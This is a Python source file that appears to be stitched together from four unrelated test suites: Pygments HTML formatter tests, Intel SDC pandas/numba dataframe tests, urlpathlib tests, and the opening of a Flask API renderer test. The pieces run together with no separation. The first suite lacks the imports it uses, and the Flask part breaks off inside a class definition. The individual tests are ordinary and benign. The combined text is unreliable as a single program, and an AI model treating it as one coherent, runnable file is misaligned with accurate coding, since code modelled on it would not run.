from os.path import join, dirname, isfile, abspath

from pygments.lexers import PythonLexer
from pygments.formatters import HtmlFormatter, NullFormatter
from pygments.formatters.html import escape_html

import support

TESTFILE, TESTDIR = support.location(__file__)

tokensource = list(PythonLexer(encoding='utf-8').get_tokens(open(TESTFILE).read()))

class HtmlFormatterTest(unittest.TestCase):
    def test_correct_output(self):
        hfmt = HtmlFormatter(nowrap=True)
        houtfile = StringIO.StringIO()
        hfmt.format(tokensource, houtfile)

        nfmt = NullFormatter()
        noutfile = StringIO.StringIO()
        nfmt.format(tokensource, noutfile)

        stripped_html = re.sub('<.*?>', '', houtfile.getvalue())
        escaped_text = escape_html(noutfile.getvalue())
        self.assertEquals(stripped_html, escaped_text)

    def test_external_css(self):
        # test correct behavior
        # CSS should be in /tmp directory
        fmt1 = HtmlFormatter(full=True, cssfile='fmt1.css', outencoding='utf-8')
        # CSS should be in TESTDIR (TESTDIR is absolute)
        fmt2 = HtmlFormatter(full=True, cssfile=join(TESTDIR, 'fmt2.css'),
                             outencoding='utf-8')
        tfile = tempfile.NamedTemporaryFile(suffix='.html')
        fmt1.format(tokensource, tfile)
        try:
            fmt2.format(tokensource, tfile)
            self.assert_(isfile(join(TESTDIR, 'fmt2.css')))
        except IOError:
            # test directory not writable
            pass
        tfile.close()

        self.assert_(isfile(join(dirname(tfile.name), 'fmt1.css')))
        os.unlink(join(dirname(tfile.name), 'fmt1.css'))
        try:
            os.unlink(join(TESTDIR, 'fmt2.css'))
        except OSError:
            pass

    def test_all_options(self):
        for optdict in [dict(nowrap=True),
                        dict(linenos=True),
                        dict(linenos=True, full=True),
                        dict(linenos=True, full=True, noclasses=True)]:

            outfile = StringIO.StringIO()
            fmt = HtmlFormatter(**optdict)
            fmt.format(tokensource, outfile)

    def test_valid_output(self):
        # test all available wrappers
        fmt = HtmlFormatter(full=True, linenos=True, noclasses=True,
                            outencoding='utf-8')

        handle, pathname = tempfile.mkstemp('.html')
        tfile = os.fdopen(handle, 'w+b')
        fmt.format(tokensource, tfile)
        tfile.close()
        catname = os.path.join(TESTDIR, 'dtds', 'HTML4.soc')
        try:
            try:
                import subprocess
                ret = subprocess.Popen(['nsgmls', '-s', '-c', catname, pathname],
                                       stdout=subprocess.PIPE).wait()
            except ImportError:
                # Python 2.3 - no subprocess module
                ret = os.popen('nsgmls -s -c "%s" "%s"' % (catname, pathname)).close()
                if ret == 32512: raise OSError  # not found
        except OSError:
            # nsgmls not available
            pass
        else:
            self.failIf(ret, 'nsgmls run reported errors')

        os.unlink(pathname)

    def test_get_style_defs(self):
        fmt = HtmlFormatter()
        sd = fmt.get_style_defs()
        self.assert_(sd.startswith('.'))

        fmt = HtmlFormatter(cssclass='foo')
        sd = fmt.get_style_defs()
        self.assert_(sd.startswith('.foo'))
        sd = fmt.get_style_defs('.bar')
        self.assert_(sd.startswith('.bar'))
        sd = fmt.get_style_defs(['.bar', '.baz'])
        fl = sd.splitlines()[0]
        self.assert_('.bar' in fl and '.baz' in fl)

    def test_unicode_options(self):
        fmt = HtmlFormatter(title=u'Föö',
                            cssclass=u'bär',
                            cssstyles=u'div:before { content: \'bäz\' }',
                            encoding='utf-8')
        handle, pathname = tempfile.mkstemp('.html')
        tfile = os.fdopen(handle, 'w+b')
        fmt.format(tokensource, tfile)
        tfile.close()

# *****************************************************************************
# Copyright (c) 2020, Intel Corporation All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
#     Redistributions of source code must retain the above copyright notice,
#     this list of conditions and the following disclaimer.
#
#     Redistributions in binary form must reproduce the above copyright notice,
#     this list of conditions and the following disclaimer in the documentation
#     and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# *****************************************************************************

import itertools
import numba
import numpy as np
import os
import pandas as pd
import pyarrow.parquet as pq
import random
import string
import unittest
from numba import types

import sdc
from sdc import hiframes
from sdc.str_arr_ext import StringArray
from sdc.tests.test_base import TestCase
from sdc.tests.test_utils import (count_array_OneDs,
                                  count_array_REPs,
                                  count_parfor_OneDs,
                                  count_parfor_REPs,
                                  dist_IR_contains,
                                  get_start_end,
                                  skip_numba_jit,
                                  skip_sdc_jit)


class TestHiFrames(TestCase):

    @skip_numba_jit
    def test_column_list_select2(self):
        # make sure SDC copies the columns like Pandas does
        def test_impl(df):
            df2 = df[['A']]
            df2['A'] += 10
            return df2.A, df.A

        hpat_func = self.jit(test_impl)
        n = 11
        df = pd.DataFrame(
            {'A': np.arange(n), 'B': np.ones(n), 'C': np.random.ranf(n)})
        np.testing.assert_array_equal(hpat_func(df.copy())[1], test_impl(df)[1])

    @skip_numba_jit
    def test_pd_DataFrame_from_series_par(self):
        def test_impl(n):
            S1 = pd.Series(np.ones(n))
            S2 = pd.Series(np.random.ranf(n))
            df = pd.DataFrame({'A': S1, 'B': S2})
            return df.A.sum()

        hpat_func = self.jit(test_impl)
        n = 11
        self.assertEqual(hpat_func(n), test_impl(n))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)
        self.assertEqual(count_parfor_OneDs(), 1)

    @skip_numba_jit
    def test_getitem_bool_series(self):
        def test_impl(df):
            return df['A'][df['B']].values

        hpat_func = self.jit(test_impl)
        df = pd.DataFrame({'A': [1, 2, 3], 'B': [True, False, True]})
        np.testing.assert_array_equal(test_impl(df), hpat_func(df))

    @skip_numba_jit
    def test_fillna(self):
        def test_impl():
            A = np.array([1., 2., 3.])
            A[0] = np.nan
            df = pd.DataFrame({'A': A})
            B = df.A.fillna(5.0)
            return B.sum()

        hpat_func = self.jit(test_impl)
        self.assertEqual(hpat_func(), test_impl())

    @skip_numba_jit
    def test_fillna_inplace(self):
        def test_impl():
            A = np.array([1., 2., 3.])
            A[0] = np.nan
            df = pd.DataFrame({'A': A})
            df.A.fillna(5.0, inplace=True)
            return df.A.sum()

        hpat_func = self.jit(test_impl)
        self.assertEqual(hpat_func(), test_impl())

    @skip_numba_jit
    def test_column_mean(self):
        def test_impl():
            A = np.array([1., 2., 3.])
            A[0] = np.nan
            df = pd.DataFrame({'A': A})
            return df.A.mean()

        hpat_func = self.jit(test_impl)
        self.assertEqual(hpat_func(), test_impl())

    @skip_numba_jit
    def test_column_var(self):
        def test_impl():
            A = np.array([1., 2., 3.])
            A[0] = 4.0
            df = pd.DataFrame({'A': A})
            return df.A.var()

        hpat_func = self.jit(test_impl)
        np.testing.assert_almost_equal(hpat_func(), test_impl())

    @skip_numba_jit
    def test_column_std(self):
        def test_impl():
            A = np.array([1., 2., 3.])
            A[0] = 4.0
            df = pd.DataFrame({'A': A})
            return df.A.std()

        hpat_func = self.jit(test_impl)
        np.testing.assert_almost_equal(hpat_func(), test_impl())

    @skip_numba_jit
    def test_column_map(self):
        def test_impl(n):
            df = pd.DataFrame({'A': np.arange(n)})
            df['B'] = df.A.map(lambda a: 2 * a)
            return df.B.sum()

        n = 121
        hpat_func = self.jit(test_impl)
        np.testing.assert_almost_equal(hpat_func(n), test_impl(n))

    @skip_numba_jit
    def test_column_map_arg(self):
        def test_impl(df):
            df['B'] = df.A.map(lambda a: 2 * a)
            return

        n = 121
        df1 = pd.DataFrame({'A': np.arange(n)})
        df2 = pd.DataFrame({'A': np.arange(n)})
        hpat_func = self.jit(test_impl)
        hpat_func(df1)
        self.assertTrue(hasattr(df1, 'B'))
        test_impl(df2)
        np.testing.assert_equal(df1.B.values, df2.B.values)

    @skip_numba_jit
    @skip_sdc_jit('Not implemented in sequential transport layer')
    def test_cumsum(self):
        def test_impl(n):
            df = pd.DataFrame({'A': np.ones(n), 'B': np.random.ranf(n)})
            Ac = df.A.cumsum()
            return Ac.sum()

        hpat_func = self.jit(test_impl)
        n = 11
        self.assertEqual(hpat_func(n), test_impl(n))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_array_OneDs(), 2)
        self.assertEqual(count_parfor_REPs(), 0)
        self.assertEqual(count_parfor_OneDs(), 2)
        self.assertTrue(dist_IR_contains('dist_cumsum'))

    @skip_numba_jit
    @skip_sdc_jit('Not implemented in sequential transport layer')
    def test_column_distribution(self):
        # make sure all column calls are distributed
        def test_impl(n):
            df = pd.DataFrame({'A': np.ones(n), 'B': np.random.ranf(n)})
            df.A.fillna(5.0, inplace=True)
            DF = df.A.fillna(5.0)
            s = DF.sum()
            m = df.A.mean()
            v = df.A.var()
            t = df.A.std()
            Ac = df.A.cumsum()
            return Ac.sum() + s + m + v + t

        hpat_func = self.jit(test_impl)
        n = 11
        self.assertEqual(hpat_func(n), test_impl(n))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)
        self.assertTrue(dist_IR_contains('dist_cumsum'))

    @skip_numba_jit
    @skip_sdc_jit('Not implemented in sequential transport layer')
    def test_quantile_parallel(self):
        def test_impl(n):
            df = pd.DataFrame({'A': np.arange(0, n, 1, np.float64)})
            return df.A.quantile(.25)

        hpat_func = self.jit(test_impl)
        n = 1001
        np.testing.assert_almost_equal(hpat_func(n), test_impl(n))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)

    @unittest.skip('Error - fix needed\n'
                   'NUMA_PES=3 build')
    def test_quantile_parallel_float_nan(self):
        def test_impl(n):
            df = pd.DataFrame({'A': np.arange(0, n, 1, np.float32)})
            df.A[0:100] = np.nan
            df.A[200:331] = np.nan
            return df.A.quantile(.25)

        hpat_func = self.jit(test_impl)
        n = 1001
        np.testing.assert_almost_equal(hpat_func(n), test_impl(n))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)

    @unittest.skip('Error - fix needed\n'
                   'NUMA_PES=3 build')
    def test_quantile_parallel_int(self):
        def test_impl(n):
            df = pd.DataFrame({'A': np.arange(0, n, 1, np.int32)})
            return df.A.quantile(.25)

        hpat_func = self.jit(test_impl)
        n = 1001
        np.testing.assert_almost_equal(hpat_func(n), test_impl(n))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)

    @unittest.skip('Error - fix needed\n'
                   'NUMA_PES=3 build')
    def test_quantile_sequential(self):
        def test_impl(A):
            df = pd.DataFrame({'A': A})
            return df.A.quantile(.25)

        hpat_func = self.jit(test_impl)
        n = 1001
        A = np.arange(0, n, 1, np.float64)
        np.testing.assert_almost_equal(hpat_func(A), test_impl(A))

    @skip_numba_jit
    def test_nunique(self):
        def test_impl(n):
            df = pd.DataFrame({'A': np.arange(n)})
            df.A[2] = 0
            return df.A.nunique()

        hpat_func = self.jit(test_impl)
        n = 1001
        np.testing.assert_almost_equal(hpat_func(n), test_impl(n))
        # test compile again for overload related issues
        hpat_func = self.jit(test_impl)
        np.testing.assert_almost_equal(hpat_func(n), test_impl(n))

    @skip_numba_jit
    def test_nunique_parallel(self):
        # TODO: test without file
        def test_impl():
            df = pq.read_table('example.parquet').to_pandas()
            return df.four.nunique()

        hpat_func = self.jit(test_impl)
        self.assertEqual(hpat_func(), test_impl())
        self.assertEqual(count_array_REPs(), 0)
        # test compile again for overload related issues
        hpat_func = self.jit(test_impl)
        self.assertEqual(hpat_func(), test_impl())
        self.assertEqual(count_array_REPs(), 0)

    @skip_numba_jit
    def test_nunique_str(self):
        def test_impl(n):
            df = pd.DataFrame({'A': ['aa', 'bb', 'aa', 'cc', 'cc']})
            return df.A.nunique()

        hpat_func = self.jit(test_impl)
        n = 1001
        np.testing.assert_almost_equal(hpat_func(n), test_impl(n))
        # test compile again for overload related issues
        hpat_func = self.jit(test_impl)
        np.testing.assert_almost_equal(hpat_func(n), test_impl(n))

    @unittest.skip('AssertionError - fix needed\n'
                   '5 != 3\n')
    def test_nunique_str_parallel(self):
        # TODO: test without file
        def test_impl():
            df = pq.read_table('example.parquet').to_pandas()
            return df.two.nunique()

        hpat_func = self.jit(test_impl)
        self.assertEqual(hpat_func(), test_impl())
        self.assertEqual(count_array_REPs(), 0)
        # test compile again for overload related issues
        hpat_func = self.jit(test_impl)
        self.assertEqual(hpat_func(), test_impl())
        self.assertEqual(count_array_REPs(), 0)

    @skip_numba_jit
    def test_unique_parallel(self):
        # TODO: test without file
        def test_impl():
            df = pq.read_table('example.parquet').to_pandas()
            return (df.four.unique() == 3.0).sum()

        hpat_func = self.jit(test_impl)
        self.assertEqual(hpat_func(), test_impl())
        self.assertEqual(count_array_REPs(), 0)

    @unittest.skip('AssertionError - fix needed\n'
                   '2 != 1\n')
    def test_unique_str_parallel(self):
        # TODO: test without file
        def test_impl():
            df = pq.read_table('example.parquet').to_pandas()
            return (df.two.unique() == 'foo').sum()

        hpat_func = self.jit(test_impl)
        self.assertEqual(hpat_func(), test_impl())
        self.assertEqual(count_array_REPs(), 0)

    @skip_numba_jit
    @skip_sdc_jit('Not implemented in sequential transport layer')
    def test_describe(self):
        def test_impl(n):
            df = pd.DataFrame({'A': np.arange(0, n, 1, np.float64)})
            return df.A.describe()

        hpat_func = self.jit(test_impl)
        n = 1001
        hpat_func(n)
        # XXX: test actual output
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)

    @skip_numba_jit
    def test_str_contains_regex(self):
        def test_impl():
            A = StringArray(['ABC', 'BB', 'ADEF'])
            df = pd.DataFrame({'A': A})
            B = df.A.str.contains('AB*', regex=True)
            return B.sum()

        hpat_func = self.jit(test_impl)
        self.assertEqual(hpat_func(), 2)

    @skip_numba_jit
    def test_str_contains_noregex(self):
        def test_impl():
            A = StringArray(['ABC', 'BB', 'ADEF'])
            df = pd.DataFrame({'A': A})
            B = df.A.str.contains('BB', regex=False)
            return B.sum()

        hpat_func = self.jit(test_impl)
        self.assertEqual(hpat_func(), 1)

    @skip_numba_jit
    def test_str_replace_regex(self):
        def test_impl(df):
            return df.A.str.replace('AB*', 'EE', regex=True)

        df = pd.DataFrame({'A': ['ABCC', 'CABBD']})
        hpat_func = self.jit(test_impl)
        pd.testing.assert_series_equal(
            hpat_func(df), test_impl(df), check_names=False)

    @skip_numba_jit
    def test_str_replace_noregex(self):
        def test_impl(df):
            return df.A.str.replace('AB', 'EE', regex=False)

        df = pd.DataFrame({'A': ['ABCC', 'CABBD']})
        hpat_func = self.jit(test_impl)
        pd.testing.assert_series_equal(
            hpat_func(df), test_impl(df), check_names=False)

    @skip_numba_jit
    def test_str_replace_regex_parallel(self):
        def test_impl(df):
            B = df.A.str.replace('AB*', 'EE', regex=True)
            return B

        n = 5
        A = ['ABCC', 'CABBD', 'CCD', 'CCDAABB', 'ED']
        start, end = get_start_end(n)
        df = pd.DataFrame({'A': A[start:end]})
        hpat_func = self.jit(distributed={'df', 'B'})(test_impl)
        pd.testing.assert_series_equal(
            hpat_func(df), test_impl(df), check_names=False)
        self.assertEqual(count_array_REPs(), 3)
        self.assertEqual(count_parfor_REPs(), 0)

    @skip_numba_jit
    def test_str_split(self):
        def test_impl(df):
            return df.A.str.split(',')

        df = pd.DataFrame({'A': ['AB,CC', 'C,ABB,D', 'G', '', 'g,f']})
        hpat_func = self.jit(test_impl)
        pd.testing.assert_series_equal(
            hpat_func(df), test_impl(df), check_names=False)

    @skip_numba_jit
    def test_str_split_default(self):
        def test_impl(df):
            return df.A.str.split()

        df = pd.DataFrame({'A': ['AB CC', 'C ABB D', 'G ', ' ', 'g\t f']})
        hpat_func = self.jit(test_impl)
        pd.testing.assert_series_equal(
            hpat_func(df), test_impl(df), check_names=False)

    @skip_numba_jit
    def test_str_split_filter(self):
        def test_impl(df):
            B = df.A.str.split(',')
            df2 = pd.DataFrame({'B': B})
            return df2[df2.B.str.len() > 1]

        df = pd.DataFrame({'A': ['AB,CC', 'C,ABB,D', 'G', '', 'g,f']})
        hpat_func = self.jit(test_impl)
        pd.testing.assert_frame_equal(
            hpat_func(df), test_impl(df).reset_index(drop=True))

    @skip_numba_jit
    def test_str_split_box_df(self):
        def test_impl(df):
            return pd.DataFrame({'B': df.A.str.split(',')})

        df = pd.DataFrame({'A': ['AB,CC', 'C,ABB,D']})
        hpat_func = self.jit(test_impl)
        pd.testing.assert_series_equal(
            hpat_func(df).B, test_impl(df).B, check_names=False)

    @skip_numba_jit
    def test_str_split_unbox_df(self):
        def test_impl(df):
            return df.A.iloc[0]

        df = pd.DataFrame({'A': ['AB,CC', 'C,ABB,D']})
        df2 = pd.DataFrame({'A': df.A.str.split(',')})
        hpat_func = self.jit(test_impl)
        self.assertEqual(hpat_func(df2), test_impl(df2))

    @unittest.skip('Getitem Series with list values not implement')
    def test_str_split_bool_index(self):
        def test_impl(df):
            C = df.A.str.split(',')
            return C[df.B == 'aa']

        df = pd.DataFrame({'A': ['AB,CC', 'C,ABB,D'], 'B': ['aa', 'bb']})
        hpat_func = self.jit(test_impl)
        pd.testing.assert_series_equal(
            hpat_func(df), test_impl(df), check_names=False)

    @skip_numba_jit
    def test_str_split_parallel(self):
        def test_impl(df):
            B = df.A.str.split(',')
            return B

        n = 5
        start, end = get_start_end(n)
        A = ['AB,CC', 'C,ABB,D', 'CAD', 'CA,D', 'AA,,D']
        df = pd.DataFrame({'A': A[start:end]})
        hpat_func = self.jit(distributed={'df', 'B'})(test_impl)
        pd.testing.assert_series_equal(
            hpat_func(df), test_impl(df), check_names=False)
        self.assertEqual(count_array_REPs(), 3)
        self.assertEqual(count_parfor_REPs(), 0)

    @skip_numba_jit
    def test_str_get(self):
        def test_impl(df):
            B = df.A.str.split(',')
            return B.str.get(1)

        df = pd.DataFrame({'A': ['AB,CC', 'C,ABB,D']})
        hpat_func = self.jit(test_impl)
        pd.testing.assert_series_equal(
            hpat_func(df), test_impl(df), check_names=False)

    @skip_numba_jit
    def test_str_split(self):
        def test_impl(df):
            return df.A.str.split(',')

        df = pd.DataFrame({'A': ['AB,CC', 'C,ABB,D']})
        hpat_func = self.jit(test_impl)
        pd.testing.assert_series_equal(hpat_func(df), test_impl(df), check_names=False)

    @skip_numba_jit
    def test_str_get_parallel(self):
        def test_impl(df):
            A = df.A.str.split(',')
            B = A.str.get(1)
            return B

        n = 5
        start, end = get_start_end(n)
        A = ['AB,CC', 'C,ABB,D', 'CAD,F', 'CA,D', 'AA,,D']
        df = pd.DataFrame({'A': A[start:end]})
        hpat_func = self.jit(distributed={'df', 'B'})(test_impl)
        pd.testing.assert_series_equal(
            hpat_func(df), test_impl(df), check_names=False)
        self.assertEqual(count_array_REPs(), 3)
        self.assertEqual(count_parfor_REPs(), 0)

    @skip_numba_jit
    def test_str_get_to_numeric(self):
        def test_impl(df):
            B = df.A.str.split(',')
            C = pd.to_numeric(B.str.get(1), errors='coerce')
            return C

        df = pd.DataFrame({'A': ['AB,12', 'C,321,D']})
        hpat_func = self.jit(locals={'C': types.int64[:]})(test_impl)
        pd.testing.assert_series_equal(
            hpat_func(df), test_impl(df), check_names=False)

    @skip_numba_jit
    def test_str_flatten(self):
        def test_impl(df):
            A = df.A.str.split(',')
            return pd.Series(list(itertools.chain(*A)))

        df = pd.DataFrame({'A': ['AB,CC', 'C,ABB,D']})
        hpat_func = self.jit(test_impl)
        pd.testing.assert_series_equal(
            hpat_func(df), test_impl(df), check_names=False)

    @skip_numba_jit
    def test_str_flatten_parallel(self):
        def test_impl(df):
            A = df.A.str.split(',')
            B = pd.Series(list(itertools.chain(*A)))
            return B

        n = 5
        start, end = get_start_end(n)
        A = ['AB,CC', 'C,ABB,D', 'CAD', 'CA,D', 'AA,,D']
        df = pd.DataFrame({'A': A[start:end]})
        hpat_func = self.jit(distributed={'df', 'B'})(test_impl)
        pd.testing.assert_series_equal(
            hpat_func(df), test_impl(df), check_names=False)
        self.assertEqual(count_array_REPs(), 3)
        self.assertEqual(count_parfor_REPs(), 0)

    @skip_numba_jit
    def test_to_numeric(self):
        def test_impl(df):
            B = pd.to_numeric(df.A, errors='coerce')
            return B

        df = pd.DataFrame({'A': ['123.1', '331.2']})
        hpat_func = self.jit(locals={'B': types.float64[:]})(test_impl)
        pd.testing.assert_series_equal(
            hpat_func(df), test_impl(df), check_names=False)

    @skip_numba_jit
    def test_1D_Var_len(self):
        def test_impl(n):
            df = pd.DataFrame({'A': np.arange(n), 'B': np.arange(n) + 1.0})
            df1 = df[df.A > 5]
            return len(df1.B)

        hpat_func = self.jit(test_impl)
        n = 11
        self.assertEqual(hpat_func(n), test_impl(n))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)

    @skip_numba_jit
    def test_rolling1(self):
        # size 3 without unroll
        def test_impl(n):
            df = pd.DataFrame({'A': np.arange(n), 'B': np.random.ranf(n)})
            Ac = df.A.rolling(3).sum()
            return Ac.sum()

        hpat_func = self.jit(test_impl)
        n = 121
        self.assertEqual(hpat_func(n), test_impl(n))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)
        # size 7 with unroll

        def test_impl_2(n):
            df = pd.DataFrame({'A': np.arange(n) + 1.0, 'B': np.random.ranf(n)})
            Ac = df.A.rolling(7).sum()
            return Ac.sum()

        hpat_func = self.jit(test_impl)
        n = 121
        self.assertEqual(hpat_func(n), test_impl(n))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)

    @skip_numba_jit
    def test_rolling2(self):
        def test_impl(n):
            df = pd.DataFrame({'A': np.ones(n), 'B': np.random.ranf(n)})
            df['moving average'] = df.A.rolling(window=5, center=True).mean()
            return df['moving average'].sum()

        hpat_func = self.jit(test_impl)
        n = 121
        self.assertEqual(hpat_func(n), test_impl(n))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)

    @skip_numba_jit
    def test_rolling3(self):
        def test_impl(n):
            df = pd.DataFrame({'A': np.ones(n), 'B': np.random.ranf(n)})
            Ac = df.A.rolling(3, center=True).apply(lambda a: a[0] + 2 * a[1] + a[2])
            return Ac.sum()

        hpat_func = self.jit(test_impl)
        n = 121
        self.assertEqual(hpat_func(n), test_impl(n))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)

    @unittest.skip('Error - fix needed\n'
                   'NUMA_PES=3 build')
    def test_shift1(self):
        def test_impl(n):
            df = pd.DataFrame({'A': np.arange(n) + 1.0, 'B': np.random.ranf(n)})
            Ac = df.A.shift(1)
            return Ac.sum()

        hpat_func = self.jit(test_impl)
        n = 11
        self.assertEqual(hpat_func(n), test_impl(n))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)

    @unittest.skip('Error - fix needed\n'
                   'NUMA_PES=3 build')
    def test_shift2(self):
        def test_impl(n):
            df = pd.DataFrame({'A': np.arange(n) + 1.0, 'B': np.random.ranf(n)})
            Ac = df.A.pct_change(1)
            return Ac.sum()

        hpat_func = self.jit(test_impl)
        n = 11
        np.testing.assert_almost_equal(hpat_func(n), test_impl(n))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)

    @skip_numba_jit
    def test_df_input(self):
        def test_impl(df):
            return df.B.sum()

        n = 121
        df = pd.DataFrame({'A': np.ones(n), 'B': np.random.ranf(n)})
        hpat_func = self.jit(test_impl)
        np.testing.assert_almost_equal(hpat_func(df), test_impl(df))

    @skip_numba_jit
    def test_df_input2(self):
        def test_impl(df):
            C = df.B == 'two'
            return C.sum()

        n = 11
        df = pd.DataFrame({'A': np.random.ranf(3 * n), 'B': ['one', 'two', 'three'] * n})
        hpat_func = self.jit(test_impl)
        np.testing.assert_almost_equal(hpat_func(df), test_impl(df))

    @skip_numba_jit
    def test_df_input_dist1(self):
        def test_impl(df):
            return df.B.sum()

        n = 121
        A = [3, 4, 5, 6, 1]
        B = [5, 6, 2, 1, 3]
        n = 5
        start, end = get_start_end(n)
        df = pd.DataFrame({'A': A, 'B': B})
        df_h = pd.DataFrame({'A': A[start:end], 'B': B[start:end]})
        hpat_func = self.jit(distributed={'df'})(test_impl)
        np.testing.assert_almost_equal(hpat_func(df_h), test_impl(df))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)

    @skip_numba_jit
    def test_concat(self):
        def test_impl(n):
            df1 = pd.DataFrame({'key1': np.arange(n), 'A': np.arange(n) + 1.0})
            df2 = pd.DataFrame({'key2': n - np.arange(n), 'A': n + np.arange(n) + 1.0})
            df3 = pd.concat([df1, df2])
            return df3.A.sum() + df3.key2.sum()

        hpat_func = self.jit(test_impl)
        n = 11
        self.assertEqual(hpat_func(n), test_impl(n))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)
        n = 11111
        self.assertEqual(hpat_func(n), test_impl(n))

    @skip_numba_jit
    def test_concat_str(self):
        def test_impl():
            df1 = pq.read_table('example.parquet').to_pandas()
            df2 = pq.read_table('example.parquet').to_pandas()
            A3 = pd.concat([df1, df2])
            return (A3.two == 'foo').sum()

        hpat_func = self.jit(test_impl)
        self.assertEqual(hpat_func(), test_impl())
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)

    @skip_numba_jit
    def test_concat_series(self):
        def test_impl(n):
            df1 = pd.DataFrame({'key1': np.arange(n), 'A': np.arange(n) + 1.0})
            df2 = pd.DataFrame({'key2': n - np.arange(n), 'A': n + np.arange(n) + 1.0})
            A3 = pd.concat([df1.A, df2.A])
            return A3.sum()

        hpat_func = self.jit(test_impl)
        n = 11
        self.assertEqual(hpat_func(n), test_impl(n))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)
        n = 11111
        self.assertEqual(hpat_func(n), test_impl(n))

    @skip_numba_jit
    def test_concat_series_str(self):
        def test_impl():
            df1 = pq.read_table('example.parquet').to_pandas()
            df2 = pq.read_table('example.parquet').to_pandas()
            A3 = pd.concat([df1.two, df2.two])
            return (A3 == 'foo').sum()

        hpat_func = self.jit(test_impl)
        self.assertEqual(hpat_func(), test_impl())
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)

    @skip_numba_jit
    @unittest.skipIf(int(os.getenv('SDC_NP_MPI', '0')) > 1, 'Test hangs on NP=2 and NP=3 on all platforms')
    def test_intraday(self):
        def test_impl(nsyms):
            max_num_days = 100
            all_res = 0.0
            for i in sdc.prange(nsyms):
                s_open = 20 * np.ones(max_num_days)
                s_low = 28 * np.ones(max_num_days)
                s_close = 19 * np.ones(max_num_days)
                df = pd.DataFrame({'Open': s_open, 'Low': s_low, 'Close': s_close})
                df['Stdev'] = df['Close'].rolling(window=90).std()
                df['Moving Average'] = df['Close'].rolling(window=20).mean()
                df['Criteria1'] = (df['Open'] - df['Low'].shift(1)) < -df['Stdev']
                df['Criteria2'] = df['Open'] > df['Moving Average']
                df['BUY'] = df['Criteria1'] & df['Criteria2']
                df['Pct Change'] = (df['Close'] - df['Open']) / df['Open']
                df['Rets'] = df['Pct Change'][df['BUY']]
                all_res += df['Rets'].mean()
            return all_res

        hpat_func = self.jit(test_impl)
        n = 11
        self.assertEqual(hpat_func(n), test_impl(n))
        self.assertEqual(count_array_OneDs(), 0)
        self.assertEqual(count_parfor_OneDs(), 1)

    @skip_numba_jit
    def test_var_dist1(self):
        def test_impl(A, B):
            df = pd.DataFrame({'A': A, 'B': B})
            df2 = df.groupby('A', as_index=False)['B'].sum()
            # TODO: fix handling of df setitem to force match of array dists
            # probably with a new node that is appended to the end of basic block
            # df2['C'] = np.full(len(df2.B), 3, np.int8)
            # TODO: full_like for Series
            df2['C'] = np.full_like(df2.B.values, 3, np.int8)
            return df2

        A = np.array([1, 1, 2, 3])
        B = np.array([3, 4, 5, 6])
        hpat_func = self.jit(locals={'A:input': 'distributed',
                                     'B:input': 'distributed', 'df2:return': 'distributed'})(test_impl)
        start, end = get_start_end(len(A))
        df2 = hpat_func(A[start:end], B[start:end])
        # TODO:
        # pd.testing.assert_frame_equal(
        #     hpat_func(A[start:end], B[start:end]), test_impl(A, B))


if __name__ == "__main__":
    unittest.main()

import pytest
import urllib.error
from urlpathlib import UrlPath


def test_scheme():

    # does not raise NotImplementedError
    UrlPath('/dev/null').touch()


def test_scheme_not_supported():

    with pytest.raises(NotImplementedError):
        UrlPath('http:///tmp/test').touch()


def test_scheme_not_listed():

    with pytest.raises(NotImplementedError):
        UrlPath('test:///tmp/test').touch()


def test_file_additional():

    assert UrlPath('.').resolve() == UrlPath.cwd()


def test_scheme_alias():

    # does not raise NotImplementedError
    with pytest.raises(urllib.error.URLError):
        UrlPath('https://localhost/test').exists()

# coding: utf8
from __future__ import unicode_literals
from flask import abort, make_response, request
from flask_api.decorators import set_renderers
from flask_api import exceptions, renderers, status, FlaskAPI
import json
import unittest


app = FlaskAPI(__name__)
app.config['TESTING'] = True


class JSONVersion1(renderers.JSONRenderer):
